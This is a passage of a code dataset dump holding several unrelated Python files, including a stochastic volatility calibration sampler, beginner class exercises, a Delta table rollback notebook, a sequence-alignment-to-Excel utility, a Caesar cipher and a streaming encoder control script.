N=',nbins)\n f2 = lambda t: torch.matrix_exp(t*G_torch)\n tv = np.linspace(0,Delta,nbins)\n torch_tv=torch.tensor(tv)\n for r in tqdm(range(1),desc='Trapezoidal rule'):\n exponential=integration_torch(f2,torch_tv,-1)\n\n\ndef sparse_dense_mul_vec(s, d):\n i = s._indices()\n v = s._values()\n dv = d[i[0,:]] # get values from relevant entries of dense matrix\n res=torch.matmul(v,dv)\n return res\n\ndef get_shuffled_integral_matrix(taylor_exp,order_signature,d):\n nbr_param=number_of_parameters_gen(order_signature*2,d+1)\n dict_words_numbers=dict(zip(get_words(d,order_signature*2),[k for k in range(nbr_param)]))\n wordz=get_words_list(d,order_signature)\n shuffled_integral_matrix=np.zeros((len(wordz),len(wordz),nbr_param))\n \n for i,word1 in enumerate(wordz):\n for j,word2 in enumerate(wordz):\n sh=shuffle(word1,word2)\n p_components=np.zeros(nbr_param)\n for shuffled in sh:\n p_components[dict_words_numbers[tuple(shuffled)]]=p_components[dict_words_numbers[tuple(shuffled)]]+1\n shuffled_integral_matrix[i,j,:]=sparse_dense_mul_vec(torch.tensor(p_components).to_sparse(),taylor_exp)\n return torch.tensor(shuffled_integral_matrix)\n\n# This commented part is to check convergence of the the trapezoidal towards the Taylor and viceversa\n# =============================================================================\n# sh1=get_shuffled_integral_matrix(taylor_exp,order_signature,d-1)\n# sh2=get_shuffled_integral_matrix(exponential,order_signature,d-1)\n# \n# error_matrix=(torch.matmul(G_torch,f2(Delta))-G_torch)*(-(Delta**3)/(nbins**2))\n# print('1000 highest Error analysis matrix:', torch.sort(error_matrix.flatten()).values[-1000:])\n# \n# \n# print('Comparison shuffled integral matrix', torch.sort(torch.abs(sh1-sh2).flatten()).values[-1000:])\n# \n# =============================================================================\n\nif numerical_approx==True:\n \n if np.max(np.abs(np.linalg.eig((G_torch*Delta).numpy())[0]))<1:\n shuffled_integral_matrix=get_shuffled_integral_matrix(taylor_exp,order_signature,d-1)\n else:\n shuffled_integral_matrix=get_shuffled_integral_matrix(exponential,order_signature,d-1)\n \n \n print('Shuffled_integral_matrix shape:',shuffled_integral_matrix.shape)\n \n print('Dimension G:', f2(Delta).shape)\n\n\n\n\n\n\n\ndef enumerated_product(*args):\n yield from zip(itt.product(*(range(len(x)) for x in args),repeat=2), itt.product(*args,repeat=2))\n\n\n\n##################### COMPUTATION OF THE Q^(0,CV) FOR THE SPX\n\nif 
flag_gatheral==True:\n os.chdir(r'/scratch.global/ag_cu/Codes_Guido/Randomness_Gatheral2/n='+str(order_signature)+'/'+config)\nelse:\n os.chdir(r'/scratch.global/ag_cu/Codes_Guido/Randomness/n='+str(order_signature)+'/'+config)\n\n\nif available_Gplus==True:\n dim=len(get_words(d-1,order_signature*2+1))\n G_torch_plus=torch.tensor(np.load('G_plus(('+str(dim)+', '+str(dim)+')).npy'))\n print('Loaded G shape:',G_torch_plus.shape)\nelse:\n G_plus=OUL(d-1,2*order_signature+1,X0,thetas,kappas,sigmas,Rho) \n G_torch_plus=torch.tensor(G_plus)\n shape_G_plus=G_torch_plus.shape\n np.save(f'G_plus({shape_G_plus}).npy',G_torch_plus.numpy())\n\nf3 = lambda t: torch.matrix_exp(t*G_torch_plus)\n\nwordz=get_words_list(d-1,order_signature)\ndict_words_numbers=dict(zip(get_words(d-1,order_signature*2+1),[k for k in range(len(get_words(d-1,order_signature*2+1)))]))\nnbr_param_x2plus=len(get_words(d-1,order_signature*2+1))\n\n\n######## VIX\n\n\n\ndef get_shuffled_integral_matrix_withtime(matrix,order_signature,d):\n nbr_param=number_of_parameters_gen(order_signature*2+1,d+1)\n dict_words_numbers=dict(zip(get_words(d,order_signature*2+1),[k for k in range(nbr_param)]))\n wordz=get_words_list(d,order_signature)\n print(wordz)\n shuffled_integral_matrix=np.zeros((len(wordz),len(wordz),nbr_param))\n print(nbr_param)\n for i,word1 in enumerate(wordz):\n for j,word2 in enumerate(wordz):\n sh=shuffle_and_add_time(word1,word2)\n p_components=np.zeros(nbr_param)\n for shuffled in sh:\n p_components[dict_words_numbers[tuple(shuffled)]]=p_components[dict_words_numbers[tuple(shuffled)]]+1\n shuffled_integral_matrix[i,j,:]=sparse_dense_mul_vec(torch.tensor(p_components).to_sparse(),matrix)\n return torch.tensor(shuffled_integral_matrix)\n\n\nprint('list joint maturities:',list_joint_maturities)\n\nsig_trivial=torch.zeros([nbr_param_x2plus]).type(torch.DoubleTensor)\nsig_trivial[0]=1\n\nif flag_save_control_variates==True:\n exps=[f3(mat+Delta)-f3(mat) for mat in tqdm(list_of_maturities_vix, desc='exp vix')]\n exps2=[f3(mat) for mat in tqdm(list_joint_maturities, desc='exp joint')]\nelse:\n print('No CV')\n \nmatrix_exp_id=f3(Delta)-torch.eye(nbr_param_x2plus)\n\n\nprint('Checkpoint before CV sampling')\n\nif numerical_approx==False:\n if flag_save_control_variates==True:\n Q_cv=torch.stack([torch.matmul(get_shuffled_integral_matrix_withtime(matrix,order_signature,d-1),sig_trivial) for matrix in tqdm(exps,desc='Q_cv')])\n Q0_cv=torch.stack([torch.matmul(get_shuffled_integral_matrix_withtime(matrix,order_signature,d-1),sig_trivial) for matrix in tqdm(exps2,desc='Q_cv0')])\n print('Shape Q0:cv', Q0_cv.shape)\n print('Shape Q:cv', Q_cv.shape)\n \n shape_Q0_cv=Q0_cv.shape\n shape_Q_cv=Q_cv.shape\n \n np.save(f'CV_exact_SPX({shape_Q0_cv}).npy',Q0_cv.numpy())\n np.save(f'CV_exact_VIX({shape_Q_cv}).npy',Q_cv.numpy())\n \n\n shuffled_integral_matrix=get_shuffled_integral_matrix_withtime(matrix_exp_id,order_signature,d-1)\n else:\n shuffled_integral_matrix=get_shuffled_integral_matrix_withtime(matrix_exp_id,order_signature,d-1)\n \n\n\n\n\nprint('Checkpoint after CV sampling')\n\n\n# dimension Q0_cv : (nbr_maturities_joint, nbr_parameters_to_calibrate, nbr_parameters_to_calibrate)\n# type Q0_cv: torch.tensor\n# dimension Q_cv : (nbr_maturities_vix, nbr_parameters_to_calibrate, nbr_parameters_to_calibrate)\n# type Q0_cv: torch.tensor\n\n\nif flag_gatheral==True:\n os.chdir(r'/scratch.global/ag_cu/Codes_Guido/Randomness_Gatheral2/n='+str(order_signature)+'/'+config)\nelse:\n 
os.chdir(r'/scratch.global/ag_cu/Codes_Guido/Randomness/n='+str(order_signature)+'/'+config)\n\n\n\ndef chol_n_transpose(q):\n    '''\n    Inputs:\n        q: np.array, positive semidefinite symmetric matrix\n    Returns:\n        U: np.array, upper triangular matrix of Cholesky decomposition\n    '''\n    return np.linalg.cholesky(q).transpose()\n\ndef filter_positive_semidef(Q,idx_mat):\n    nbr_params=Q.shape[-1]\n    Q=Q[idx_mat,:,:,:].numpy()\n    check_eigenvalues=np.sum(np.linalg.eigvalsh(Q)>0,axis=1)\n    bad_indices=np.where(check_eigenvalues<nbr_params)[0]\n    Q=np.delete(Q,bad_indices,axis=0)\n    return Q\n\ndef cholesky_dec(Q,idx_mat):\n    '''\n    Inputs:\n        Q: torch.tensor, stack of matrices for one maturity\n        idx_mat: int, index of the maturity (idx_mat>=0)\n    Returns: list of Cholesky decompositions\n    '''\n    \n    Q=filter_positive_semidef(Q,idx_mat)\n    adjusted_mc_number=Q.shape[0] \n    list_=np.array(Parallel(n_jobs=-1)(delayed(chol_n_transpose)(Q[j,:,:]) for j in tqdm(range(adjusted_mc_number),desc='Chol')))\n    return list_\n\n\nprint('List of joint maturities:',list_joint_maturities)\n\n\nwordz=get_words_list(d-1,order_signature)\ndict_words_numbers=dict(zip(get_words(d-1,order_signature*2+1),[k for k in range(len(get_words(d-1,order_signature*2+1)))]))\n\n\ndef sample_tilde_df_andQ0_multimaturities(N,maturities,mat_spx,mat_vix,X0,sigmas,kappas,thetas,Rho,order_signature,flag_mat,indices,new_tilde,keys_df,keys_df_vix,Cov,d,idx_Z_d,shuffled_integral_matrix,dict_words_numbers,wordz):\n    \n    \n    idx_vix=np.nonzero(mat_vix[:, None] == maturities)[1]\n    \n    \n    # Raw sig\n    sig=sample_sig_OU_multi_minimal_all_mat(N,maturities,X0,sigmas,kappas,thetas,Rho,2*order_signature+1,flag_mat)\n    sig_df_spx=pd.DataFrame(data=sig,index=indices , columns=keys_df)\n    sig_df_vix=pd.DataFrame(data=sig[idx_vix],index=indices[:len(mat_vix)], columns=keys_df)\n    \n    \n    # For spx\n    transformed_sig_df=transform_df_multivariate(sig_df_spx,new_tilde,order_signature,d,Cov)\n    transformed_sig_df, not_dropped=remove_redundant_components(transformed_sig_df,idx_Z_d,d,True)\n    transformed_sig_df= torch.tensor(np.array(transformed_sig_df))\n    \n    keys_df_vix2=[str(word).replace(',','') if len(word)==1 else str(word).replace(' ','') for word in get_words(d-1,order_signature*2+1)]\n    sig_df_spx=sig_df_spx.loc[:,keys_df_vix2]\n\n    \n    nbr_param_x2plus=sig_df_spx.shape[1] \n    Q0_all=np.zeros((len(maturities),len(not_dropped),len(not_dropped)))\n    sig_df_spx=torch.tensor(np.transpose(np.array(sig_df_spx)))\n    \n    \n    for idx,word1 in enumerated_product(wordz):\n        sh=shuffle_and_add_time(word1[0],word1[1])\n        p_components=np.zeros(nbr_param_x2plus)\n        for shuffled in sh:\n            p_components[dict_words_numbers[tuple(shuffled)]]=p_components[dict_words_numbers[tuple(shuffled)]]+1\n        Q0_all[:,idx[0],idx[1]]=torch.matmul(torch.tensor(p_components),sig_df_spx)\n    \n    Q0_all=torch.tensor(Q0_all)\n    # For vix\n    Q=torch.matmul(shuffled_integral_matrix,torch.transpose(torch.tensor(sig_df_vix[keys_df_vix2].values),0,1))\n    \n    \n    return [transformed_sig_df, Q0_all,Q]\n\n\n\n\n\n# CHANGE HERE THE DIRECTORY WHERE YOU WOULD LIKE TO STORE THE RANDOMNESS \n\n\nif flag_gatheral==True:\n    os.chdir(r'/scratch.global/ag_cu/Codes_Guido/Randomness_Gatheral2/n='+str(order_signature)+'/'+config)\nelse:\n    os.chdir(r'/scratch.global/ag_cu/Codes_Guido/Randomness/n='+str(order_signature)+'/'+config)\n\n\n\n\nrounds=8\nMC_nbr=10000\nprint('Checkpoint before sampling')\n\nif flag_missing_last==True:\n    for u in tqdm(range(1),desc='Slice samples'):\n        \n        \n        random_components = 
Parallel(n_jobs=-1)(delayed(sample_tilde_df_andQ0_multimaturities)(N,list_joint_maturities,list_of_maturities_spx,list_of_maturities_vix,X0,sigmas,kappas,thetas,Rho,order_signature,flag_mat,indices,new_tilde,keys_df,keys_df_vix,Cov,d,idx_Z_d,shuffled_integral_matrix,dict_words_numbers,wordz) for j in tqdm(range(MC_nbr)))\n random_components = [item for sublist in random_components for item in sublist]\n \n\n E_sig_B=torch.transpose(torch.stack(random_components[0::3]),0,1)\n Q0=torch.transpose(torch.stack(random_components[1::3]),0,1)\n Q=torch.transpose(torch.transpose(torch.stack(random_components[2::3]),0,3),1,3)\n\n \n if flag_chol_vix==True:\n L=np.array([cholesky_dec(Q,k) for k in tqdm(range(Q.shape[0]),desc='By Maturity')])\n L_torch=torch.tensor(L)\n np.save(f'L({order_signature},{d},7).npy',L)\n else:\n np.save(f'Q({order_signature},{d},7).npy',Q.numpy())\n \n \n np.save(f'E_sig_B({order_signature},{d},7).npy',E_sig_B.numpy())\n np.save(f'Q_0({order_signature},{d},7).npy',Q0.numpy())\n \n \nelse:\n \n print('Total number of Monte Carlo Samples will be :',int(MC_nbr*rounds))\n \n for u in tqdm(range(rounds),desc='Slice samples'):\n \n \n random_components = Parallel(n_jobs=-1)(delayed(sample_tilde_df_andQ0_multimaturities)(N,list_joint_maturities,list_of_maturities_spx,list_of_maturities_vix,X0,sigmas,kappas,thetas,Rho,order_signature,flag_mat,indices,new_tilde,keys_df,keys_df_vix,Cov,d,idx_Z_d,shuffled_integral_matrix,dict_words_numbers,wordz) for j in tqdm(range(MC_nbr)))\n random_components = [item for sublist in random_components for item in sublist]\n \n \n E_sig_B=torch.transpose(torch.stack(random_components[0::3]),0,1)\n Q0=torch.transpose(torch.stack(random_components[1::3]),0,1)\n Q=torch.transpose(torch.transpose(torch.stack(random_components[2::3]),0,3),1,3)\n \n \n \n if flag_chol_vix==True:\n L=np.array([cholesky_dec(Q,k) for k in tqdm(range(Q.shape[0]),desc='By Maturity')])\n L_torch=torch.tensor(L)\n np.save(f'L({order_signature},{d},{u}).npy',L)\n else:\n np.save(f'Q({order_signature},{d},{u}).npy',Q.numpy())\n \n \n \n \n np.save(f'E_sig_B({order_signature},{d},{u}).npy',E_sig_B.numpy())\n np.save(f'Q_0({order_signature},{d},{u}).npy',Q0.numpy())\n \n np.save('Rho_d='+str(d)+'.npy',Rho)\n \n \n \n","repo_name":"GuidoGazzani-ai/jointcalib_sigsde","sub_path":"sampler/Joint_Calibration_Sampler.py","file_name":"Joint_Calibration_Sampler.py","file_ext":"py","file_size_in_byte":33532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71213497768","text":"class Person:\n def __init__(self, age, name):\n self.age = age\n self.name = name\n self.__friends = []\n\n def know(self, other):\n self.__friends.append(other)\n\n def is_known(self, other):\n return other in self.__friends\n\n\nperson1 = Person(18, 'Oleg')\nperson2 = Person(24, 'Dima')\nperson3 = Person(25, 'Vitalik')\nperson1.know(person2)\nprint(person1.is_known(person2))\nprint(person1.is_known(person3))\n\n\n","repo_name":"AnnHalii/Python_Hillel","sub_path":"lk_11_hw/2_task.py","file_name":"2_task.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24882092401","text":"from person import Person,Staff,Fellow\nfrom room import Room,Office,LivingSpace\n\nclass Dojo(Room,Person):\n def __init__(self):\n self.rooms = []\n self.persons = []\n def create_room(self,room_name,room_type):\n if room_type.upper() == \"OFFICE\":\n room = 
Office(str(room_name.upper()))\n self.rooms.append(room_name)\n print(\"An {} called {} has been created successfully\".format(room_type,room_name))\n if room_type.upper() == \"LIVINGSPACE\":\n room = LivingSpace(str(room_name.upper()))\n self.rooms.append(room_name)\n print(\"A {} called {} has been created successfully\".format(room_type,room_name))\n \n def add_person(self,name,role):\n if role.upper() == \"FELLOW\":\n person = Fellow(name)\n self.persons.append(name)\n print(\"Fellow {} has been successfully added\".format(name))\n \n if role.upper() == \"STAFF\":\n person = Staff(name)\n self.persons.append(name)\n print(\"Staff {} has been successfully added \".format(name)) \n\nroom1 = Dojo()\nroom1.create_room('Newyork','Office') \nroom1.add_person('Sankara','fellow')\nprint(room1.persons)\nroom2 = Dojo()\nroom2.create_room('Mexico','LivingSpace') ","repo_name":"Roland-Sankara/SpaceAllocation","sub_path":"Space_Allocation/dojo.py","file_name":"dojo.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14254088053","text":"# Databricks notebook source\n# MAGIC %run ./utils\n\n# COMMAND ----------\n\ndbutils.widgets.text(name='Version', defaultValue='0')\ndbutils.widgets.dropdown('Table', 'None', table_names() + ['None'])\n#dbutils.widgets.removeAll()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC #### Reset table\n\n# COMMAND ----------\n\nversion = int(dbutils.widgets.get('Version'))\ntable = str(dbutils.widgets.get('Table'))\ndatabase, table_name = table.split('.')[0], table.split('.')[1] \nold_version = ks.read_delta(path='dbfs:/user/hive/warehouse/{}.db/{}/'.format(database, table_name),\n version=version)\nold_version.to_table(name=table,\n format='delta',\n mode='overwrite')","repo_name":"MoAdel1/FinancialDataIngestion","sub_path":"jobs/rollback.py","file_name":"rollback.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25653697425","text":"def ceaser_cipher_encrypt(text, key):\n encrypted_text = \"\"\n for i in text:\n if i == \" \":\n encrypted_text += i\n elif i.isupper():\n encrypted_text += chr((((ord(i) + key) - 65 )% 26) + 65)\n else:\n encrypted_text += chr((((ord(i) + key) - 97 )% 26) + 97)\n\n return encrypted_text\n\n\ndef ceaser_cipher_decrypt(text, key):\n decrypted_text = \"\"\n for i in text:\n if i == \" \":\n decrypted_text += i\n elif i.isupper():\n decrypted_text += chr((((ord(i) - key) - 65 )% 26) + 65)\n else:\n decrypted_text += chr((((ord(i) - key) - 97 )% 26) + 97)\n\n return decrypted_text\n\n\ntext = input(\"Enter the Text to Encrypt!\\n\")\nkey = int(input(\"Enter the Key for Encryption!\\n\"))\n\nprint(\"Encrypted Text: {}\".format(ceaser_cipher_encrypt(text=text, key=int(key))))\n\nprint(\"Decrypted Text: {}\".format(ceaser_cipher_decrypt(\n text=ceaser_cipher_encrypt(text=text, key=int(key)), key=int(key))\n )\n )\n\n","repo_name":"HarshitDawar55/CryptoGraphy","sub_path":"Ceaser-Cipher/python/ceaser.py","file_name":"ceaser.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70021025128","text":"from os import listdir\nfrom os.path import isfile, join\nimport pandas as pd\nimport openpyxl\nfrom time import clock\nimport random\nimport math\nimport Bio as bio\nfrom Bio import SeqIO\nimport glob\n\nimport Logic\n\nclass Utils:\n def 
__init__(self):\n self.ext_txt = \".txt\"\n self.ext_dat = \".dat\"\n self.ext_xlsx = \".xlsx\"\n\n \"\"\"\n get file lists in target dir by target ext\n :param\n path : target dir + \"*.\" + target ext\n :return\n ['target dir/file_name.target ext', 'target dir/file_name.target ext' ...]\n \"\"\"\n def get_files_from_dir(self, path):\n return glob.glob(path)\n\n \"\"\"\n :return\n {'D:/000_WORK/YuGooSang_KimHuiKwon/20200609/WORK_DIR/first_excel_output\\\\result_gDNA_0609.txt': \n [\n ['1', 'Group1,2_RT/20-PBS/7-#Target723'\n , 'AATATATCTTGTGGAAAGGACGAAACACCG--CATACTCGGGCGC-------CGGGGTGTTTTAGAGCTAGAAATAGCAAGTTAAAATAAGGCTAGACCGTTATCAACTTGAAAAAGTGGCACCGAGTCGGTGCACATGCCAGGTGGACGAGTTTTCTTGCTTTTTTTGATACTCTGTCTGTACTACAACGCCCATTTCCGCAAGAAAACTGGTCTACCTGGCATGTTCAGCTTGGCGTACCGCGATCTCTACTCTACCACTTGTACTTCAGCGGTCAGCTTACTCGACTTAA'\n , '.||||||||||||||||||||||||||||| ||| .|| ||| | ||||||||||||||||||||||||||||||||||||||.||||||||||||||||||||||||||||||||||||||||||||||||.|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||'\n , 'TATATATCTTGTGGAAAGGACGAAACACCGCCCAT-TTC---CGCAAGAAAAC-----GTTTTAGAGCTAGAAATAGCAAGTTAAAATAAGGCTAGTCCGTTATCAACTTGAAAAAGTGGCACCGAGTCGGTGCACATGCCAGGTAGACgAGTTTTCTTGCTTTTTTTGATACTCTGTCTGTACTACAACGCCCATTTCCGCAAGAAAACTGGTCTACCTGGCATGTTCAGCTTGGCGTAcCgcGATCTCTACTCTACCACTTGTACTTCAGCGGTCAGCTTACTCGACTTAA', '293', '293', '293', 'O']\n , ['2', 'Group1,2_RT/12-PBS/11-#Target1948'\n , 'TATATATCTTGTGGAAAGGACGAAACACCGAAGTCCGTCAGATTCTATCGTTTTAGAGCTAGAAATAGCAAGTTAAAATAAGGCTAGTCCGTTATCAACTTGAAAAAGTGGCACCGAGTCGGTGCATACCACGAGATAGAATCTGACGTTTTTTTCGTACTCATATATACATATCTCTAAGTCCGTCAGATTCTATCTGGTGGTATCTCCAGGTGAAGCTTGGCGTACCGCGATCTCTACTCTACCACTTGTACTTCAGCGGTCAGCTTACTCGACTTAA'\n , '||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||'\n , 'TATATATCTTGTGGAAAGGACGAAACACCGAAGTCCGTCAGATTCTATCGTTTTAGAGCTAGAAATAGCAAGTTAAAATAAGGCTAGTCCGTTATCAACTTGAAAAAGTGGCACCGAGTCGGTGCATACCACgAGATAGAATCTGACGTTTTTTTCGTACTCATATATACATATCTCTAAGTCCGTCAGATTCTATCTGGTGGTATCTCCAGGTGAAGCTTGGCGTAcCgcGATCTCTACTCTACCACTTGTACTTCAGCGGTCAGCTTACTCGACTTAA', '280', '280', '280', 'O']\n , ['3', 'Group1,2_RT/20-PBS/17-#Target833'\n , '-----------------------------------------------------------------------------------------CG-------CTTGAAAAAGTGGCACCGAGTCGGTGCTTACCTCTTTGGATCGTGATCACAATCCTCCAGATGCTTTTTTTCAGATAGCATACTGTATACTGGGCATCTGGAGGATTGTGATCAGGATCCAAAGAGGTAATGAGCTTGGCGTACCGCGATCTCTACTCTACCACTTGTACTTCAGCGGTCAGCTTACTCGACTTAACGTGCACGTGACACGTTCCAGACCGTACATGCTTACATGGGATGAAGCTTGGCGTAACTAGATCTTGAGACAAATGGCAGTATT'\n , ' || |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| '\n , 'TATATATCTTGTGGAAAGGACGAAACACCGCATCTGGAGGATTGTGATCGTTTTAGAGCTAGAAATAGCAAGTTAAAATAAGGCTAGTCCGTTATCAACTTGAAAAAGTGGCACCGAGTCGGTGCTTACCTCTTTGGATCgTGATCACAATCCTCCAGATGCTTTTTTTCAGATAGCATACTGTATACTGGGCATCTGGAGGATTGTGATCAGGATCCAAAGAGGTAATGAGCTTGGCGTAcCgcGATCTCTACTCTACCACTTGTACTTCAGCGGTCAGCTTACTCGACTTAA------------------------------------------------------------------------------------', '378', '378', '378', 'O']\n , ['4', 'Group1,2_RT/12-PBS/9-#Target489'\n , 
'TATATATCTTGTGGAAAGGACGAAACACCGGCGCGGAACAGGTCG--ATC-TGTTTTAGAGCTAGAAATAGCAAGTTAAAATAAGGCTAGTCCGTTATCAACTTGAAAAAGTGGCACCGAGTCGGTGCAAGTACCGTTTGATGCCGCTGTTTTTTTCATACACGACACACATCTGAGGTCGTTCACCAGCGGCATCAAAGGGTACTTCATGGCGCATAGCTTGGTGTACCGCGATCTCTACTCTACCACTTGTACTTCAGCGGTCAGCTTACTCGACTTAA'\n , '||||||||||||||||||||||||||||| |||...|.||| || ||| .||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||.||||||||||||||||||||||||||||||||||||||||||||||||||||||||'\n , 'TATATATCTTGTGGAAAGGACGAAACACC-GCGTTCACCAG--CGGCATCAAGTTTTAGAGCTAGAAATAGCAAGTTAAAATAAGGCTAGTCCGTTATCAACTTGAAAAAGTGGCACCGAGTCGGTGCAAGTACCgTTTGATGCCGCTGTTTTTTTCATACACGACACACATCTGAGGTCGTTCACCAGCGGCATCAAAGGGTACTTCATGGCGCATAGCTTGGCGTAcCgcGATCTCTACTCTACCACTTGTACTTCAGCGGTCAGCTTACTCGACTTAA', '281', '281', '281', 'O']\n ...]}\n \"\"\"\n def get_result_dict_by_fnm(self, sources):\n result_dict = {}\n for i in range(len(sources)):\n tmp_list = []\n with open(sources[i], \"r\") as f:\n print(sources[i])\n print(f.readline())\n while True:\n tmp_line = f.readline().replace(\"\\n\", \"\")\n if tmp_line == \"\":\n break\n tmp_list.append(tmp_line.split(\"\\t\"))\n\n result_dict[sources[i]] = tmp_list\n\n return result_dict\n\n \"\"\"\n :param\n result_dict = { 'file_name as key' : \n [['Final index', sub_dict, ins_dict, del_dict, last index of ref_seq], ...]\n , 'D:/000_WORK/YuGooSang_KimHuiKwon/20200609/WORK_DIR/first_excel_output\\\\result_gDNA_0609.txt': \n [['Group1,2_RT/20-PBS/7-#Target723'\n , {1: 'T->A', 36: 'T->C', 88: 'T->A', 137: 'A->G'}\n , {35: 'A', 38: 'GGG', 49: 'GGGGT'}\n , {31: 'C', 32: 'C', 42: 'A', 43: 'A', 44: 'G', 45: 'A', 46: 'A', 47: 'A', 48: 'A'}, 284]\n , ['Group1,2_RT/12-PBS/11-#Target1948', {}, {}, {}, 280]\n , ['Group1,2_RT/20-PBS/17-#Target833'\n , {}\n , {294: 'CGTGCACGTGACACGTTCCAGACCGTACATGCTTACATGGGATGAAGCTTGGCGTAACTAGATCTTGAGACAAATGGCAGTATT'}\n , {1: 'T', 2: 'A', 3: 'T', 4: 'A', 5: 'T', 6: 'A', 7: 'T', 8: 'C', 9: 'T', 10: 'T', 11: 'G', 12: 'T', 13: 'G', 14: 'G', 15: 'A', 16: 'A', 17: 'A', 18: 'G', 19: 'G', 20: 'A', 21: 'C', 22: 'G', 23: 'A', 24: 'A', 25: 'A', 26: 'C', 27: 'A', 28: 'C', 29: 'C', 30: 'G', 31: 'C', 32: 'A', 33: 'T', 34: 'C', 35: 'T', 36: 'G', 37: 'G', 38: 'A', 39: 'G', 40: 'G', 41: 'A', 42: 'T', 43: 'T', 44: 'G', 45: 'T', 46: 'G', 47: 'A', 48: 'T', 49: 'C', 50: 'G', 51: 'T', 52: 'T', 53: 'T', 54: 'T', 55: 'A', 56: 'G', 57: 'A', 58: 'G', 59: 'C', 60: 'T', 61: 'A', 62: 'G', 63: 'A', 64: 'A', 65: 'A', 66: 'T', 67: 'A', 68: 'G', 69: 'C', 70: 'A', 71: 'A', 72: 'G', 73: 'T', 74: 'T', 75: 'A', 76: 'A', 77: 'A', 78: 'A', 79: 'T', 80: 'A', 81: 'A', 82: 'G', 83: 'G', 84: 'C', 85: 'T', 86: 'A', 87: 'G', 88: 'T', 89: 'C', 92: 'T', 93: 'T', 94: 'A', 95: 'T', 96: 'C', 97: 'A', 98: 'A'}\n , 294]\n , ['Group1,2_RT/12-PBS/9-#Target489'\n , {33: 'T->C', 34: 'T->G', 35: 'C->G', 37: 'C->A', 49: 'A->T', 222: 'C->T'}\n , {29: 'G', 40: 'GT'}\n , {43: 'G', 44: 'C', 48: 'A'}\n , 278]\n ]\n }\n \"\"\"\n def make_excel(self, path, result_dict):\n logic = Logic.Logics()\n\n for fn_key, val_list in result_dict.items():\n workbook = openpyxl.Workbook()\n sheet = workbook.active\n\n row = 1\n sheet.cell(row=row, column=1, value=\"index\")\n sheet.cell(row=row, column=2, value='Final index')\n sheet.cell(row=row, column=3, value='Type')\n sheet.cell(row=row, column=4, value='Start')\n sheet.cell(row=row, column=5, value='End')\n sheet.cell(row=row, column=6, value='Sequence')\n\n for val_arr in val_list:\n final_index = 
val_arr[0].replace('\"', '')\n sub_dict = val_arr[1]\n ins_dict = val_arr[2]\n del_dict = val_arr[3]\n last_idx = val_arr[4]\n end_idx = 0\n for i in range(last_idx):\n if i > end_idx:\n if i in sub_dict:\n row += 1\n sheet.cell(row=row, column=1, value=str(row - 1))\n sheet.cell(row=row, column=2, value=final_index)\n sheet.cell(row=row, column=3, value='Sub')\n sheet.cell(row=row, column=4, value=str(i))\n end_idx, sub_seq_from, sub_seq_to = logic.get_sub_idx_seq(i + 1, sub_dict, sub_dict[i].split(\"->\"))\n sheet.cell(row=row, column=5, value=str(end_idx))\n sheet.cell(row=row, column=6, value=sub_seq_from + \"->\" + sub_seq_to)\n\n elif i in del_dict:\n row += 1\n sheet.cell(row=row, column=1, value=str(row - 1))\n sheet.cell(row=row, column=2, value=final_index)\n sheet.cell(row=row, column=3, value='Del')\n sheet.cell(row=row, column=4, value=str(i))\n end_idx, del_seq = logic.get_del_idx_seq(i + 1, del_dict, del_dict[i])\n sheet.cell(row=row, column=5, value=str(end_idx))\n sheet.cell(row=row, column=6, value=del_seq)\n\n elif i in ins_dict:\n row += 1\n sheet.cell(row=row, column=1, value=str(row - 1))\n sheet.cell(row=row, column=2, value=final_index)\n sheet.cell(row=row, column=3, value='Ins')\n sheet.cell(row=row, column=4, value=str(i))\n if i == last_idx:\n sheet.cell(row=row, column=5, value=str(i))\n else:\n sheet.cell(row=row, column=5, value=str(i + 1))\n sheet.cell(row=row, column=6, value=ins_dict[i])\n if \"result_\" in fn_key:\n workbook.save(filename=path + fn_key[fn_key.index(\"result_\") + len(\"result_\"):].replace(\".txt\",\n \"\") + self.ext_xlsx)\n else:\n workbook.save(filename=path + fn_key[fn_key.index(\"input\") + len(\"input\") + 1:].replace(\".txt\", \"\") + self.ext_xlsx)\n\n\n\n","repo_name":"astroboi-SH-KWON/analyze_EMBOSS_Needle_result","sub_path":"Util.py","file_name":"Util.py","file_ext":"py","file_size_in_byte":11392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71456621607","text":"from encoder import encoder #include encoder.py\n\n\nenc = encoder(\"192.168.88.252\",\"m0dts\",\"xxxxx\") #setup new encoder instance - IP of encoder,stream name, stream key\n#enc.restartUDP() #UDP is normally enabled by the Pluto but can need re-starting\nenc.set_streaming_source()\nenc.streaming(\"SD\")\nenc.streaming(\"OFF\")\nenc.streaming(\"HD\")\n\nenc.create_osd_image(\"M0DTS\",64)\nenc.upload_osd_image(0,\"image.jpg\") #MainStream\nenc.disable_osd_image(0)\nenc.enable_osd_image(0,15,15,64)\n\n#enc.create_osd_image(\"M0DTS\",48)\n#enc.upload_osd_image(1,\"image.jpg\") 